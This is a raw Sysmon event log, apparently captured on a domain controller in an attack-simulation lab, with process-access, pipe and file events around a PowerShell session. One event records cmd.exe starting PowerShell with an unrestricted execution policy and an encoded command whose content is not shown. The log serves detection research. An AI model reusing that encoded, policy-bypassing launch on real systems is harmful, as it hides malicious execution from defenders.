12:00:00.419{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-6440-6064-D802-00000000AD01}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
17141700x8000000000000000541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:00.388{266CAFBE-6440-6064-D802-00000000AD01}4220\PSHost.132616656003269239.4220.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.372{266CAFBE-6440-6064-D802-00000000AD01}4220ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0q2sstgb.mbw.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.372{266CAFBE-6440-6064-D802-00000000AD01}4220ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_vmht4nqj.n2w.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.372{266CAFBE-6440-6064-D802-00000000AD01}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_vmht4nqj.n2w.ps12021-03-31 12:00:00.372 10341000x8000000000000000537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.357{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6440-6064-D802-00000000AD01}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.341{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.341{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.341{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.326{266CAFBE-6440-6064-D602-00000000AD01}12965004C:\Windows\system32\conhost.exe{266CAFBE-6440-6064-D802-00000000AD01}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.326{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.326{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.326{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.326{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.326{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.326{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.326{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.326{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.326{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.326{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6440-6064-D802-00000000AD01}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.326{266CAFBE-6440-6064-D702-00000000AD01}25084904C:\Windows\system32\cmd.exe{266CAFBE-6440-6064-D802-00000000AD01}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
154100x8000000000000000521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.326{266CAFBE-6440-6064-D802-00000000AD01}4220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6440-6064-072B-120000000000}0x122b070HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6440-6064-D702-00000000AD01}2508C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 10341000x8000000000000000520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.310{266CAFBE-6440-6064-D602-00000000AD01}12965004C:\Windows\system32\conhost.exe{266CAFBE-6440-6064-D702-00000000AD01}2508C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.310{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.310{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.310{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.310{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.310{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 